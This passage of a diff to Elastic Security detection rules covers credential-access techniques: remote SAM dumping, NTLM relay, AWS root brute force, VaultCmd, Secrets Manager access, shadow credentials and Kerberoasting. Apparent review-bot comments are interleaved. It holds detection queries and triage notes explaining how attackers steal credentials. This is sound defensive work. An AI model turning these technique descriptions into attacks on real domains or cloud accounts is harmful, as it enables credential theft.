@@ -53,5 +71,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 4
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_relay_ntlm_auth_via_http_spoolss.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_relay_ntlm_auth_via_http_spoolss.json
index 47a585adb9af3..dc6d8ede0cc46 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_relay_ntlm_auth_via_http_spoolss.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_relay_ntlm_auth_via_http_spoolss.json
@@ -18,6 +18,23 @@
 "https://github.com/topotam/PetitPotam",
 "https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "4682fd2c-cfae-47ed-a543-9bed37657aa6",
 "severity": "high",
@@ -46,5 +63,5 @@
 }
 ],
 "type": "eql",
- "version": 1
+ "version": 2
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_remote_sam_secretsdump.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_remote_sam_secretsdump.json
index f7876ff80e688..469b8f4e0a45a 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_remote_sam_secretsdump.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_remote_sam_secretsdump.json
@@ -12,13 +12,76 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Remote Credential Access via Registry", - "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, \nsuch as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain\ncached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to\ndecrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped\ncredentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target\nhost.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious\nmust be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThis rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be\ncollected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "sequence by host.id, user.id with maxspan=1m\n [authentication where\n event.outcome == \"success\" and\n winlog.logon.type == \"Network\" and not user.name == \"ANONYMOUS LOGON\" and\n not user.domain == \"NT AUTHORITY\" and source.ip != \"127.0.0.1\" and source.ip !=\"::1\"]\n [file where event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : \"S-1-5-21-*\" and file.size >= 30000]\n", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material,\nsuch as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain\ncached credentials (LSA secrets). 
Dumping these hives in combination with the SYSTEM hive enables the attacker to\ndecrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped\ncredentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target\nhost.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious\nmust be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "sequence by host.id, user.id with maxspan=1m\n [authentication where\n event.outcome == \"success\" and event.action == \"logged-in\" and\n winlog.logon.type == \"Network\" and not user.name == \"ANONYMOUS LOGON\" and\n not user.domain == \"NT AUTHORITY\" and source.ip != \"127.0.0.1\" and source.ip !=\"::1\"]\n [file where event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : \"S-1-5-21-*\" and file.size >= 30000 and\n not file.path :\n (\"?:\\\\Windows\\\\system32\\\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_*.registry\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat\",\n \"?:\\\\Users\\\\*\\\\ntuser.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\NTUSER.DAT\")]\n", "references": [ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.size", + "type": "long" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + 
"ecs": true, + "name": "user.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "850d901a-2a3c-46c6-8b22-55398a01aad8", + "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be\ncollected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -68,5 +131,5 @@ } ], "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_root_console_failure_brute_force.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_root_console_failure_brute_force.json index b20ef22a9d152..434ae68781a0b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_root_console_failure_brute_force.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_root_console_failure_brute_force.json 
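Review bot: The new `required_fields` entries declare `winlog.logon.type` and `file.Ext.header_bytes` with `"type": "unknown"` even though the query compares `winlog.logon.type == "Network"` and wildcard-matches `file.Ext.header_bytes`, so consumers of this metadata cannot tell how those fields are mapped; the same `unknown` typing appears for `winlog.event_data.AttributeLDAPDisplayName` in the shadow-credentials hunk while the delegation hunk types `winlog.event_data.PrivilegeList` as `keyword`, so the non-ECS winlog fields are typed inconsistently across the three rules. If the generator resolves these from the integration schema the `unknown` values may be intentional, but otherwise they should be aligned (presumably `keyword` for all three). The query change also adds five `file.path` exclusions for profile hives without any mention in `note` or `setup`; a sentence under False positive analysis such as `Writes of per-user profile hives (NTUSER.DAT, UsrClass.dat and their logs) by svchost.exe are excluded as expected system activity; review these exclusions if tuning the rule.` would tell tuners where the false-negative tradeoff lies. Finally, the `setup` text reads `Both data should be collected from the host`; `Both data sources should be collected from the host` is the intended wording.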
@@ -14,13 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Management Console Brute Force of Root User Identity", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:signin.amazonaws.com and event.action:ConsoleLogin and aws.cloudtrail.user_identity.type:Root and event.outcome:failure\n", "references": [ "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "4d50a94f-2844-43fa-8395-6afbd5e1c5ef", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -54,5 +89,5 @@ "value": 10 }, "type": "threshold", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_saved_creds_vaultcmd.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_saved_creds_vaultcmd.json index d7b15ae14924e..6fbe8e75c04cf 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_saved_creds_vaultcmd.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_saved_creds_vaultcmd.json 
@@ -12,14 +12,37 @@ "language": "eql", "license": "Elastic License v2", "name": "Searching for Saved Credentials via VaultCmd", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and\n (process.pe.original_file_name:\"vaultcmd.exe\" or process.name:\"vaultcmd.exe\") and\n process.args:\"/list*\"\n", "references": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://web.archive.org/web/20201004080456/https://rastamouse.me/blog/rdp-jump-boxes/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "be8afaed-4bcd-4e0a-b5f9-5562003dde81", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -59,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_secretsmanager_getsecretvalue.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_secretsmanager_getsecretvalue.json index 6d0d4c8d112a4..14af6936e126a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_secretsmanager_getsecretvalue.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_secretsmanager_getsecretvalue.json 
@@ -16,22 +16,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Access Secret in Secrets Manager", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS Access Secret in Secrets Manager\n\nAWS Secrets Manager is a service that enables the replacement of hardcoded credentials in code, including passwords, with\nan API call to Secrets Manager to retrieve the secret programmatically.\n\nThis rule looks for the retrieval of credentials using the API `GetSecretValue` action.\n\n#### Possible investigation steps\n\n- Identify the account and its role in the environment, and inspect the related policy.\n- Identify the applications that should use this account.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Investigate abnormal values in the `user_agent.original` field by comparing them with the intended and authorized usage\nand historical data. Suspicious user agent values include non-SDK, AWS CLI, custom user agents, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences involving other users.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Review IAM permission policies for the user identity and specific secrets accessed.\n- Examine the request parameters. 
These might indicate the source of the program or the nature of its tasks.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- False positives may occur due to the intended usage of the service. Tuning is needed in order to have higher\nconfidence. Consider adding exceptions \u2014 preferably with a combination of user agent and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Rotate secrets or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:secretsmanager.amazonaws.com and event.action:GetSecretValue\n", "references": [ "https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html", "http://detectioninthe.cloud/credential_access/access_secret_in_secrets_manager/" ], - "risk_score": 73, + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, "rule_id": "a00681e3-9ed6-447c-ab2c-be648821c622", - "severity": "high", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", "tags": [ "Elastic", "Cloud", "AWS", "Continuous Monitoring", "SecOps", - "Data Protection" + "Data Protection", + "Credential Access" ], 
"threat": [ { @@ -52,5 +78,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_seenabledelegationprivilege_assigned_to_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_seenabledelegationprivilege_assigned_to_user.json index baa66851cb366..1e42d2bc70e1a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_seenabledelegationprivilege_assigned_to_user.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_seenabledelegationprivilege_assigned_to_user.json 
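Review bot: The hunk lowers `risk_score` from 73 to 47 and `severity` from `high` to `medium` alongside the metadata sync, but nothing on the rule or in the diff records why the rating changed; a reader of the rule history will only see the version bump. The new `note` hints at the reason ("False positives may occur due to the intended usage of the service"), so I would state it explicitly in the commit description or add a sentence to the note such as `Severity is medium because GetSecretValue is also issued by legitimate applications; raise it after tuning exceptions for known callers.` The note also asks analysts to inspect `user_agent.original` and the source IP, which are not in `required_fields` (correctly, since the query does not use them); stating in `setup` that the CloudTrail data must carry these fields for the triage steps to be usable would avoid surprises on trimmed pipelines.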
@@ -11,7 +11,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Sensitive Privilege SeEnableDelegationPrivilege assigned to a User", - "note": "## Triage and analysis\n\n### Investigating Sensitive Privilege SeEnableDelegationPrivilege assigned to a User\n\nKerberos delegation is an Active Directory feature that allows user and computer accounts to impersonate other accounts,\nact on their behalf, and use their privileges. Delegation (constrained and unconstrained) can be configured\nfor user and computer objects.\n\nEnabling unconstrained delegation for a computer causes the computer to store the ticket-granting ticket\n(TGT) in memory at any time an account connects to the computer, so it can be used by the computer for impersonation\nwhen needed. Risk is heightened if an attacker compromises computers with unconstrained delegation enabled, as they\ncould extract TGTs from memory and then replay them to move laterally on the domain. If the attacker coerces a privileged\nuser to connect to the server, or if the user does so routinely, the account will be compromised and the attacker will\nbe able to pass-the-ticket to privileged assets.\n\nSeEnableDelegationPrivilege is a user right that is controlled within the Local Security Policy of a domain controller\nand is managed through Group Policy. This setting is named **Enable computer and user accounts to be trusted for\ndelegation**.\n\nIt is critical to control the assignment of this privilege. A user with this privilege and write access to a computer\ncan control delegation settings, perform the attacks described above, and harvest TGTs from any user that connects to\nthe system. 
\n\n#### Possible investigation steps\n\n- Investigate how the privilege was assigned to the user and who assigned it.\n- Investigate other potentially malicious activity that was performed by the user that assigned the privileges using the\n`user.id` and `winlog.activity_id` fields as a filter during the past 48 hours.\n- Investigate other alerts associated with the users/host during the past 48 hours.\n\n### False positive analysis\n\n- The SeEnableDelegationPrivilege privilege should not be assigned to users. If this rule is triggered in your\nenvironment legitimately, the security team should notify the administrators about the risks of using it.\n\n### Related rules\n\n- KRBTGT Delegation Backdoor - e052c845-48d0-4f46-8a13-7d0aba05df82\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Remove the privilege from the account.\n- Review the privileges of the administrator account that performed the action.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policy Configuration >\nAudit Policies >\nPolicy Change >\nAudit Authorization Policy Change (Success,Failure)\n```\n", + "note": "## Triage and analysis\n\n### Investigating Sensitive Privilege SeEnableDelegationPrivilege assigned to a User\n\nKerberos delegation is an Active Directory feature that allows user and computer accounts to impersonate other accounts,\nact on their behalf, and use their privileges. 
Delegation (constrained and unconstrained) can be configured\nfor user and computer objects.\n\nEnabling unconstrained delegation for a computer causes the computer to store the ticket-granting ticket\n(TGT) in memory at any time an account connects to the computer, so it can be used by the computer for impersonation\nwhen needed. Risk is heightened if an attacker compromises computers with unconstrained delegation enabled, as they\ncould extract TGTs from memory and then replay them to move laterally on the domain. If the attacker coerces a privileged\nuser to connect to the server, or if the user does so routinely, the account will be compromised and the attacker will\nbe able to pass-the-ticket to privileged assets.\n\nSeEnableDelegationPrivilege is a user right that is controlled within the Local Security Policy of a domain controller\nand is managed through Group Policy. This setting is named **Enable computer and user accounts to be trusted for\ndelegation**.\n\nIt is critical to control the assignment of this privilege. A user with this privilege and write access to a computer\ncan control delegation settings, perform the attacks described above, and harvest TGTs from any user that connects to\nthe system.\n\n#### Possible investigation steps\n\n- Investigate how the privilege was assigned to the user and who assigned it.\n- Investigate other potentially malicious activity that was performed by the user that assigned the privileges using the\n`user.id` and `winlog.activity_id` fields as a filter during the past 48 hours.\n- Investigate other alerts associated with the users/host during the past 48 hours.\n\n### False positive analysis\n\n- The SeEnableDelegationPrivilege privilege should not be assigned to users. 
If this rule is triggered in your\nenvironment legitimately, the security team should notify the administrators about the risks of using it.\n\n### Related rules\n\n- KRBTGT Delegation Backdoor - e052c845-48d0-4f46-8a13-7d0aba05df82\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Remove the privilege from the account.\n- Review the privileges of the administrator account that performed the action.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.action: \"Authorization Policy Change\" and event.code:4704 and winlog.event_data.PrivilegeList:\"SeEnableDelegationPrivilege\"\n", "references": [ "https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/", 
@@ -20,8 +20,26 @@ "https://www.thehacker.recipes/ad/movement/kerberos/delegations", "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0105_windows_audit_authorization_policy_change.md" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.PrivilegeList", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "f494c678-3c33-43aa-b169-bb3d5198c41d", + "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policy Configuration >\nAudit Policies >\nPolicy Change >\nAudit Authorization Policy Change (Success,Failure)\n```", "severity": "high", "tags": [ "Elastic", @@ -53,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_shadow_credentials.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_shadow_credentials.json index 5c9fc3f5777ed..b952b613909af 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_shadow_credentials.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_shadow_credentials.json 
@@ -14,15 +14,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Shadow Credentials added to AD Object", - "note": "## Config\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nDS Access > \nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```\n", + "note": "", "query": "event.action:\"Directory Service Changes\" and event.code:\"5136\" and winlog.event_data.AttributeLDAPDisplayName:\"msDS-KeyCredentialLink\"\n", "references": [ "https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab", "https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials", "https://github.com/OTRF/Set-AuditRule" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "79f97b31-480e-4e63-a7f4-ede42bf2c6de", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity 
Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```", "severity": "high", "tags": [ "Elastic", @@ -51,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_spn_attribute_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_spn_attribute_modified.json index e7f5161885910..5c570d11b0263 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_spn_attribute_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/credential_access_spn_attribute_modified.json 
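Review bot: The `setup` string's Set-AuditRule example hard-codes `-AdObjectPath 'AD:\CN=Users,DC=Domain,DC=com'` without saying that the distinguished name is a placeholder, and since the text itself says the audit policy "does not cover User objects", operators who paste the command unchanged will get an audit rule for a non-existent path and no 5136 events for `msDS-KeyCredentialLink`. I would add a sentence before the code block: `Replace DC=Domain,DC=com with your domain's DN, and repeat the command for every container or OU that holds user objects, since the rule below only audits children of CN=Users.` That last clause is an inference from `-InheritanceFlags Children` and should be confirmed against the Set-AuditRule documentation the reference already links.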
@@ -11,8 +11,8 @@ "language": "kuery", "license": "Elastic License v2", "name": "User account exposed to Kerberoasting", - "note": "## Triage and analysis\n\n### Investigating User account exposed to Kerberoasting\n\nService Principal Names (SPNs) are names by which Kerberos clients uniquely identify service instances for Kerberos target\ncomputers.\n\nBy default, only computer accounts have SPNs, which creates no significant risk, since machine accounts have a default\ndomain policy that rotates their passwords every 30 days, and the password is composed of 120 random characters, making\nthem invulnerable to Kerberoasting.\n\nA user account with an SPN assigned is considered a service account, and is accessible to the entire domain. If any\nuser in the directory requests a ticket-granting service (TGS), the domain controller will encrypt it with the secret\nkey of the account executing the service. An attacker can potentially perform a Kerberoasting attack with this\ninformation, as the human-defined password is likely to be less complex.\n\nFor scenarios where SPNs cannot be avoided on user accounts, Microsoft provides the Group Managed Service Accounts (gMSA)\nfeature, which ensures that account passwords are robust and changed regularly and automatically. 
